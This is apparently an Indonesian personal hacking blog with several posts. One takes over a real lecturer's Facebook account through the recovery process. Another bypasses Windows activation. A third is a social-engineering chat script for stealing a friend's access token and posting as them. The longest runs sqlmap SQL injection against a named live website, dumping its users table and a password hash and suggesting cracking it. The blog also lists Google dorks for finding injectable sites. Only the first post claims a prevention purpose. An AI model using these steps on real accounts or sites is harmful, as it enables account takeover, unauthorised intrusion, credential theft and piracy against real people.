Pages

Subscribe:

Labels

Minggu, 16 Juni 2013

Maaf anda adalah Korban Pertanyaan Anda (Hack Account FB)

Semua Perihal yang saya Tulis di BLOG ini semata-mata untuk media PENCEGAHAN AKSI HACKING ACCOUNT FACEBOOK. Pelajari & Perhatikan dengan SEKSAMA kenapa FACEBOOK bisa di HACK. Dengan PENGETAHUAN ini, Saya Harap ANDA semua bisa LEBIH PAHAM untuk MENGAMANKAN SERANGAN HACKING ACCCOUNT FACEBOOK.
1. Ada pertanyaan yang umum dan sering ditanyakan oleh para Newbie Tanpa "ingin tahu" kenapa Facebook bisa di Hack. 

2. Saya ingin mengetahui siapakah dia sebenarnya ? Saya buka Facebooknya dan melihat Informasi profilnya. Ternyata dia adalah "SEORANG DOSEN". Dalam Hati, kenapa TENAGA PENGAJAR malah bertanya seperti ini ya..?? Aaahhh... ambil sisi Positifnya sajalah. 

3. Saya kembali ingin mencoba-coba mengambil alih Account Facebooknya. Dengan Harapan dan Tujuan => memberikan dia PEMAHAMAN Bagaimana FACEBOOK bisa di HACK. Saya pun akhirnya membuka Browser yang lainnya pada komputer saya dan membuka halaman FACEBOOK. Kemudian menekan tombol LUPA PASSWORD

4. Pada Halaman Pencarian Account Facebook, saya memasukkan Nama dia berdasarkan Informasi yang telah saya dapatkan dari CONTACT INFORMATION.  

5. Ternyata muncul suatu halaman yang mengharuskan mengisi 2 kalimat. saya pun mengisinya. 


6. Halaman selanjutnya adalah proses PENGIRIMAN KATA SANDI BARU. Apakah yang terjadi jika  saya bilang kepada FACEBOK bahwa Alamat E-MAIL tersebut "SUDAH TIDAK BISA LAGI" saya PERGUNAKAN.

7. Dan Facebook pun PERCAYA bahwa saya memang sudah TIDAK BISA LAGI MENGGUNAKAN Alamat E-MAIL tersebut dengan memberikan Alamat E-MAIL ALTERNATIF kepada saya (alamat E-MAIL Baru). karena saya memiliki 4 alamat e-mail, maka saya bisa menggunakan salah satu alamat e-mail tersebut untuk saya masukkan pada alamat baru e-mail saya.

8. Dan saya pun akhirnya dibawa pada halaman yang mengharuskan saya untuk memberikan informasi (KODE SANDI BARU) kepada 3 teman saya untuk saya jadikan pihak yang akan menerima KODE SANDI BARU tersebut.


9. Saya pun akhirnya memilih 3 Teman saya yang siap menerima suatu KODE SANDI BARU agar saya bisa kembali mengambil alih Account Facebook saya.

10. Dan ini adalah hasil akhir dari proses pemilihan teman saya tersebut. 3 orang yang akan menerima KODE SANDI BARU. sekarang saatnya menekan tombol Kirim Kode Ke Teman.

11. Sekarang saatnya saya menghubungi 3 Teman saya yang telah mendapatkan KODE SANDI BARU untuk saya masukkan pada KOLOM SANDI BARU. 

12.  Instruksi selanjutnya dari FACEBOOK saya baca dan pelajari pada E-MAIL saya yang telah dikirim oleh Facebook.  

Dengan METODE inilah HACKER biasanya Mengambil Alih (Take Over) Account Facebook seseorang

Jadi langkah BAIK untuk mencegah serangan semacam ini adalah 
A. Hidden / Remove (Hapus) semua Informasi pada Facebook anda.
B. Apabila anda ingin memberikan Informasi di halaman CONTACT INFORMATION, Usahakan INFORMASI PALSU. 
C. Ubah Settingan pada Account Facebook Anda menjadi lebih PRIVAT. 


SARAN & KRITIK saya nantikan dari pembaca. 

Rabu, 31 Oktober 2012

Solusi untuk BLANK SCREEN DESKTOP Windows 7 dan REMOVE Windows Genuine Activation

Tutorial Berikut ini adalah Tutorial yang saya buat untuk Menyelesaikan Masalah dari Desktop Blank Screen pada Windows 7 setelah kita Berhasil Login / Logon pertama kali (setelah Restart).

Perlu diketahui, Blank Screen Desktop pada Windows 7 dikarenakan adanya Windows Genuine Activation (WGA) yang masih ada pada OS Windows 7 kita setelah masa TRIAL (30 hari) kita Habis.

Berikut adalah Step-by-step untuk Menghilangkan WGA dan menghilangkan Blank Screen Desktop :
A. MENGHILANGKAN BLANK SCREEN DESKTOP

caranya yaitu :
1. buka "My Computer" lalu pilih modus VIEW ALL HIDEN FOLDER, dengan cara Pilih menu "Organize" lalu pilih "Folders and Search Options".


Selanjutnya pilih menu tab "VIEW" dan "UN-CHECKLIST" pilihan berikut :


2. setelah semua HIDDEN FOLDER dapat terlihat, maka masuklah ke FOLDER : " C:\Users\VIXUS\AppData\Roaming\Microsoft\Windows\Themes ".
INGAT = GANTI nama VIXUS dengan nama komputer anda.
kemudian HAPUS semua file yang ada di dalam FOLDER tersebut.


3. Selanjutnya kita "DISABLE DULU MICROSOFT WINDOWS UPDATE" kita, dengan cara masuk ke "Control Panel" dan pilih menu "UPDATE Windows", pilih menu "CHANGE SETTING" dan pilih "NEVER CHECK FOR UPDATE".



4. Klik OK. kemudian masuk lagi ke WINDOWS UPDATE tersebut untuk menghapus UPDATE FILE KB971033. Cara menghapusnya yaitu = pilih menu disebelah kiri "VIEW UPDATE HISTORY" dan kemudian pilih menu "INSTALLED UPDATE" dan gunakan fasilitas Searching untuk mencari file "Update KB971033".




Restart Komputer anda.

5. Download "Windows Loader" dan install.
Download Windows Loader dapat anda temukan di URL = http://sourceforge.net/projects/windows7loader/
Tunggu hingga Windows Loader selesai di INSTALL di komputer anda dan RESTART lagi komputer anda.

B. REMOVE WGA dalam Komputer Anda.

6. Download terlebih dahulu Softwarenya pada URL = http://www.softpedia.com/progDownload/RemoveWGA-Download-42782.html
Install Software tersebut dan Tunggu Hingga selesai dan Restart komputer anda.

7. Setelah semuanya selesai, Buka PICTURE yang akan anda jadikan Wallpaper dan Set As Wallpaper.
Dengan cara-cara diatas, komputer anda TIDAK ADA LAGI BLANK SCREEN DESKTOP.

Kamis, 25 Oktober 2012

Update Status Facebook, tapi menggunakan Account Facebook Teman

Tutorial kali ini adalah tutorial sederhana yang saya ambil dari blognya : http://vanz-program.cyber4rt.com, lebih lengkapnya pada halaman : http://vanz-program.cyber4rt.com/2012/05/update-status-teman-menggunakan.html

Berikut adalah langkah-langkah cara UPDATE STATUS FACEBOOK tapi menggunakan ACCOUNT FACEBOOK TEMAN kita.
maksutnya : setelah kita berhasil update status, status tersebut adalah milik Temen FB kita.

1. Berikan URL berikut kepada teman kita (Calon korban) untuk mengetahui Access Token miliknya.

https://www.facebook.com/dialog/permissions.request?app_id=2254487659&next=http%3A%2F%2Fwww.facebook.com%2F&response_type=token&perms=publish_stream

Gunakan sedikit Rayuan + Bujukan agar sang korban percaya kepada anda bahwa LINK tersebut TIDAK BERBAHAYA dan dia mau mengembalikan URL yang ada ACCESS TOKEN nya tadi kepada anda.
Contoh rayuan (bujukannya) via chatting Facebook = 

+ eh buukk, apa kabar. facebook lagi ERROR ya? kok aku buka via
https://www.facebook.com/dialog/permissions.request?app_id=2254487659&next=http%3A%2F%2Fwww.facebook.com%2F&response_type=token&perms=publish_stream gak bisa sih..??

dilaptop mu bisa kebuka gak? 

+++ bisa kok, malah lancar banget di laptop ku. 

+ haahh... masa' sih? coba PASTE kan URL facebook mu ke chattingan kita ini.
:) penasaran nih, beneran bisa pa gak. 

+++ ya udah, nih. bla..bla..bla..

+ okey, thanks. ternyata beneran bisa. mungkin tadi laptop ku yang loading nya LEMOT. hehehhee.... 



contoh, disini saya menggunakan Access Token Facebook milik temen saya Bahrowi.
( Maaf ya kawan. )
>> https://www.facebook.com/messages/bahrowi.wijaya <<

http://www.facebook.com/#access_token=AAAAAAIZAgwGsBAJnZCspBIJAqXzHspNbNFYKKRlBDWPtu0ZBF86rBLEanTDk964qSKtoSj6Dw72IaqVTT1TtXOQHGYRCyEZD&expires_in=0




Access Tokennya adalah
AAAAAAIZAgwGsBAJnZCspBIJAqXzHspNbNFYKKRlBDWPtu0ZBF86rBLEanTDk964qSKtoSj6Dw72IaqVTT1TtXOQHGYRCyEZD


2. Gunakan Graph Facebook untuk mengetahui ID FACEBOOK miliknya.
berikut adalah URL untuk mengetahui ID Facebook : http://graph.facebook.com/Usernamekorban 

Contoh : http://graph.facebook.com/bahrowi.wijaya




3. Saatnya UPDATE STATUS.
Berikut adalah URL yang HARUS kita Gunakan.
https://graph.facebook.com/IDKorban/feed?method=POST&message=Pesan yang mau disampaikan &access_token=AccessToken
contoh : Access Token + ID Facebook saya 

https://graph.facebook.com/1633121448/feed?method=POST&message=Bahrowi Maaf ya. AKu UJI COBA LAB. ku&access_token=AAAAAAIZAgwGsBAJnZCspBIJAqXzHspNbNFYKKRlBDWPtu0ZBF86rBLEanTDk964qSKtoSj6Dw72IaqVTT1TtXOQHGYRCyEZD

Kemudian Tekan ENTER.


dan jika menampilkan Data sebagai berikut, berarti kita TELAH BERHASIL UPDATE STATUS FACEBOOK menggunakan Account Teman kita.


Hasilnya : Kita berhasil melakukan update status pada korban kita.



Jumat, 10 Agustus 2012

Tutorial SQL Injection with SQL MAP

Berikut adalah Tutorial menggunakan SQL MAP untuk mendapatkan user Account dari DATABASE sebuah Website.
NB = SQLMAP adalah tools hacking yang berjalan di OS LINUX.
NB = aku anggap kamu sudah install TOOLS SQLMAP ini di OS LINUX mu.

KETERANGAN PERINTAH = 
--dbs         : untuk mengetahui ada berapa DATABASE di website tersebut 
--tables     : untuk mengetahui ada table apa saja di website tersebut 
--columns : untuk mengetahui ada berapa column dari table yang kita pilih 
--level 5    : untuk meningkatkan tingkat scanning kita hingga ke level 5 dari website yang kita scan 
--random-agent : untuk (maaf saya belum tahu) 
-D , -T ,-C : Database, Table, Column

Target = http://www.barracuda.gr

1. Buka TERMINAL mu dan pindah ke directory dimana SQL MAP mu kamu simpan.
NB = saya mendowload ulang dan menyimpan FOLDER SQLMAP di Desktop LINUX BACKTRACK saya.  

setelah masuk ke directory / folder penyimpanan tools SQLMAP, ketikkan perintah ini di TERMINAL mu :
=> ./sqlmap.py -u http://www.barracuda.gr/newsone.php?id=50 --random-agent --dbs

kalau saya seperti ini hasil lengkap dari syntaxnya =
root@bt:~/Desktop/HACK/sqlmap# ./sqlmap.py -u http://www.barracuda.gr/newsone.php?id=50 --random-agent --dbs

hasilnya

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:43:09

[22:43:09] [INFO] fetched random HTTP User-Agent header from file '/root/Desktop/HACK/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 5.1; uk; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
[22:43:12] [INFO] testing connection to the target url
[22:43:15] [INFO] testing if the url is stable, wait a few seconds
[22:43:24] [INFO] url is stable
[22:43:24] [INFO] testing if GET parameter 'id' is dynamic
[22:43:26] [INFO] confirming that GET parameter 'id' is dynamic
[22:43:27] [INFO] GET parameter 'id' is dynamic
[22:43:28] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[22:43:28] [INFO] testing for SQL injection on GET parameter 'id'

[22:43:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:43:37] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[22:43:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[22:43:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:43:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y

[22:45:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[22:45:31] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found                                                                                                
[22:45:36] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test                                    
[22:45:48] [INFO] target url appears to have 8 columns in query
[22:45:57] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Y
sqlmap identified the following injection points with a total of
21 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=50 AND 2597=2597

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=50 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6364683a,0x54647175584c58446754,0x3a62796f3a), NULL, NULL, NULL, NULL, NULL, NULL#
---
[22:46:36] [INFO] testing MySQL
[22:46:40] [INFO] confirming MySQL
[22:46:43] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.22
back-end DBMS: MySQL >= 5.0.0
[22:46:43] [INFO] fetching database names
[22:46:44] [INFO] the SQL query used returns 2 entries
[22:46:48] [INFO] retrieved: "information_schema"
[22:46:49] [INFO] retrieved: "barrak_db"                                                                                      
available databases [2]:                                                                                                      
[*] barrak_db
[*] information_schema

[22:46:49] [INFO] fetched data logged to text files under '/root/Desktop/HACK/sqlmap/output/www.barracuda.gr'

[*] shutting down at 22:46:49 

2. Kita sudah tahu DATABASE nya dari web site tersebut. Ada 2 macam yaitu Barrack_db dan Information_schema .
sekarang ketikkan perintah berikut untuk mengetahui table-tablenya :
=> ./sqlmap.py -u http://www.barracuda.gr/newsone.php?id=50 --random-agent -D barrak_db --tables

hasilnya

sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org                                                                                                                                                                                               
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
                                                                                                                                                                                               
[*] starting at 22:49:05                                                                                                                                                                       
                                                                                                                                                                                               
[22:49:05] [INFO] fetched random HTTP User-Agent header from file '/root/Desktop/HACK/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.427.0 Safari/534.1
[22:49:05] [INFO] resuming back-end DBMS 'mysql'                                                   
[22:49:07] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:                                                                                                           
---                                                                                                                                                                                            
Place: GET                                                                                                                                                                                     
Parameter: id                                                                                                                                                                                  
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=50 AND 2597=2597

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=50 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6364683a,0x54647175584c58446754,0x3a62796f3a), NULL, NULL, NULL, NULL, NULL, NULL#
---

[22:49:11] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[22:49:11] [INFO] fetching tables for database: 'barrak_db'

[22:49:13] [INFO] the SQL query used returns 7 entries
[22:49:14] [INFO] retrieved: "article"
[22:49:16] [INFO] retrieved: "newsletter"
[22:49:17] [INFO] retrieved:"offers"
[22:49:18] [INFO] retrieved: "photos_tbl"
[22:49:20] [INFO] retrieved: "products_tbl"
[22:49:21] [INFO] retrieved: "tbl_category"
[22:49:23] [INFO] retrieved: "users"
Database: barrak_db                                                                                                                                                                            
[7 tables]
+--------------+
| article         |
| newsletter   |
| offers          |
| photos_tbl  |

| products_tbl |
| tbl_category |
| users           |
+--------------+



[22:51:40] [INFO] fetched data logged to text files under '/root/Desktop/HACK/sqlmap/output/www.barracuda.gr'

[*] shutting down at 22:51:40 


3. Kita sudah dapat table-table apa saja yang ada di dalam DATABASE tersebut beserta.
Saya tertarik dengan TABLE USER, mungkin berisi NAMA-NAMA USER termasuk ADMIN yang dipergunakan untuk LOGIN didalam webpage login.
Selanjutnya ketikkan perintah berikut untuk mengetahui COLUMN apa saja yang ada di dalam tabel USER :
./sqlmap.py -u http://www.barracuda.gr/newsone.php?id=50 --random-agent -D barrak_db -T users --columns

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:18:10

[23:18:10] [INFO] fetched random HTTP User-Agent header from file '/root/Desktop/HACK/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.0 Chrome/10.0.648.0 Safari/534.16                                                                                                                           
[23:18:10] [INFO] resuming back-end DBMS 'mysql'
[23:18:10] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=50 AND 2597=2597

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=50 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6364683a,0x54647175584c58446754,0x3a62796f3a), NULL, NULL, NULL, NULL, NULL, NULL#
---
[23:18:15] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[23:18:15] [INFO] fetching columns for table 'users' in database 'barrak_db'

[23:18:15] [INFO] the SQL query used returns 18 entries
[23:18:15] [INFO] resumed: "userid","int(5)"
[23:18:15] [INFO] resumed: "firstname","varchar(30)"
[23:18:15] [INFO] resumed: "lastname","varchar(30)"
[23:18:15] [INFO] resumed: "username","varchar(20)"
[23:18:15] [INFO] resumed: "password","varchar(100)"
[23:18:15] [INFO] resumed: "useraddress","varchar(50)"
[23:18:15] [INFO] resumed: "postalcode","int(8)"
[23:18:15] [INFO] resumed: "perioxi","varchar(30)"
[23:18:15] [INFO] resumed: "poli","varchar(30)"
[23:18:15] [INFO] resumed: "phone","int(10)"
[23:18:15] [INFO] resumed: "usermail","varchar(30)"
[23:18:15] [INFO] resumed: "confirm_hash","varchar(40)"
[23:18:15] [INFO] resumed: "is_confirmed","int(3)"
[23:18:15] [INFO] resumed: "userip","varchar(15)"
[23:18:15] [INFO] resumed: "date_created","date"
[23:18:15] [INFO] resumed: "islogged","int(3)"
[23:18:15] [INFO] resumed: "last_logging","date"
[23:18:15] [INFO] resumed: "user_level","int(3)"
Database: barrak_db                                                                                                                                                                            
Table: users
[18 columns]
+--------------+--------------+
| Column       | Type                 |
+--------------+--------------+
| confirm_hash | varchar(40)  |
| date_created  | date               |
| firstname        | varchar(30)  |
| is_confirmed  | int(3)             |
| islogged          | int(3)            |
| last_logging   | date               |
| lastname         | varchar(30)  |
| password        | varchar(100)|
| perioxi            | varchar(30)  |
| phone              | int(10)          |
| poli                 | varchar(30)  |
| postalcode      | int(8)            |
| user_level       | int(3)            |
| useraddress    | varchar(50)  |
| userid             | int(5)            |
| userip             | varchar(15)  |
| usermail         | varchar(30)  |
| username        | varchar(20) |
+--------------+--------------+

[23:18:15] [INFO] fetched data logged to text files under '/root/Desktop/HACK/sqlmap/output/www.barracuda.gr'

[*] shutting down at 23:18:15


4. Sesuai Dugaan, Tidak hanya terdapat Column USERNAME, melainkan terdapat Column PASSWORD juga.
mari kita DUMP #devils mode = on
ketikkan perintah berikut :
=> ./sqlmap.py -u http://www.barracuda.gr/newsone.php?id=50 --random-agent -D barrak_db -T users -C password,username,usermail,userid,userip,user_level --dump

hasilnya

sqlmap/1.0-dev - automatic SQL injection and database takeover tool 
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:21:13

[23:21:13] [INFO] fetched random HTTP User-Agent header from file '/root/Desktop/HACK/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2                                                                                                                                                                                            
[23:21:13] [INFO] resuming back-end DBMS 'mysql'
[23:21:13] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=50 AND 2597=2597

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=50 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6364683a,0x54647175584c58446754,0x3a62796f3a), NULL, NULL, NULL, NULL, NULL, NULL#
---
[23:21:18] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[23:21:18] [INFO] fetching entries of column(s) 'password, user_level, userid, userip, usermail, username' for table 'users' in database 'barrak_db'
[23:21:18] [INFO] the SQL query used returns 1 entries
[23:21:19] [INFO] retrieved: "a65d487491bd8078e3fc7c83db598cbe","3","15","","","barrak"
[23:21:19] [INFO] analyzing table dump for possible password hashes recognized possible password hashes in column 'password'. Do you want to crack them via a dictionary-based attack? [y/N/q] Y
[23:21:22] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/root/Desktop/HACK/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1

[23:21:24] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] Y

[23:21:26] [INFO] starting dictionary-based cracking (md5_generic_passwd)

[23:21:26] [INFO] starting 4 processes
[23:21:45] [INFO] using suffix '1'
[23:22:03] [INFO] using suffix '123'
[23:22:22] [INFO] using suffix '2'
[23:22:41] [INFO] using suffix '12'
[23:22:59] [INFO] using suffix '3'
[23:23:17] [INFO] using suffix '13'
[23:23:37] [INFO] using suffix '7'
[23:23:56] [INFO] using suffix '11'
[23:24:14] [INFO] using suffix '5'
[23:24:34] [INFO] using suffix '22'
[23:24:53] [INFO] using suffix '23'
[23:25:13] [INFO] using suffix '01'
[23:25:32] [INFO] using suffix '4'
[23:25:50] [INFO] using suffix '07'
[23:26:11] [INFO] using suffix '21'
[23:26:30] [INFO] using suffix '14'
[23:26:49] [INFO] using suffix '10'
[23:27:10] [INFO] using suffix '06'
[23:27:29] [INFO] using suffix '08'
[23:27:50] [INFO] using suffix '8'
[23:28:09] [INFO] using suffix '15'
[23:28:30] [INFO] using suffix '69'
[23:28:49] [INFO] using suffix '16'
[23:29:07] [INFO] using suffix '6'
[23:29:25] [INFO] using suffix '18'
[23:29:43] [INFO] using suffix '!'
[23:30:02] [INFO] using suffix '.'
[23:30:21] [INFO] using suffix '*'
[23:30:41] [INFO] using suffix '!!'
[23:31:01] [INFO] using suffix '?'
[23:31:20] [INFO] using suffix ';'
[23:31:39] [INFO] using suffix '..'
[23:31:58] [INFO] using suffix '!!!'
[23:32:16] [INFO] using suffix ','
[23:32:36] [INFO] using suffix '@'
[23:32:55] [INFO] writing uncracked hashes to file '/tmp/tmps5Ogjj.txt' for eventual further processing
[23:32:55] [WARNING] no clear password(s) found
[23:32:55] [INFO] postprocessing table dump
Database: barrak_db
Table: users
[1 entry]
+--------+---------+----------+----------+---------------------------------------------------+----------------+
| userid | userip     | username | usermail | password                                                | user_level      |
+--------+---------+----------+----------+---------------------------------------------------+----------------+
| 15       | <blank> | barrak      | <blank>  | a65d487491bd8078e3fc7c83db598cbe | 3                    |
+--------+---------+----------+----------+---------------------------------------------------+-----------------+

[23:32:55] [INFO] table 'barrak_db.users' dumped to CSV file '/root/Desktop/HACK/sqlmap/output/www.barracuda.gr/dump/barrak_db/users.csv'
[23:32:55] [INFO] fetched data logged to text files under '/root/Desktop/HACK/sqlmap/output/www.barracuda.gr'

[*] shutting down at 23:32:55 


DAMN....!!!!
PASSWORD nya bukan PASSWORD TELANJANG.
jadi kita harus DECRYPT dulu password tersebut.
HITUNG jumlah PASSWORD HASH nya (ada 32 panjang bit), berarti kemungkinan menggunakan ENCRYPTION MD5.
mari kita coba decrypt menggunakan MD5 DECRYPTOR ONLINE.
atau alternatif lain kita menggunakan " WWW.GOOGLE.COM "
ketikkan HASH PASSWORD tersebut pada GOOGLE
dan beginilah hasilnya


kita juga dapat membuktikan melalui LINK PASTEBIN



Kali ini SAYA BELUM BERUNTUNG + Belum punya waktu untuk men-DECRYPT password tersebut.
Semoga ada waktu buat maen-maen dengan PASSWORD ini.
(:

Sabtu, 04 Agustus 2012

ALL DORK

1. For enter (bypass Account and password) in MYSQL DATABASE.
open your www.google.com and type allinurl:index.php?db=information_schema
2. For dork SQL Injection
open your google and type => inurl:newsone.php?id=

Senin, 16 Juli 2012

Change Default Searching on Mozilla Firefox

This tutorial focus about change web default searching on mozilla Firefox browser.
Lets to the main topic.
1. open your Firefox browser and type "about:config" at URL Address.
choose I'll be careful, I Promise option to open address search box.


2. Than type "keyword.url" on address search. like this below picture :


3. Double click those information and than type " http://www.google.com/search?ie=UTF-8&oe=utf-8&q=



4. Restart Your Firefox Browser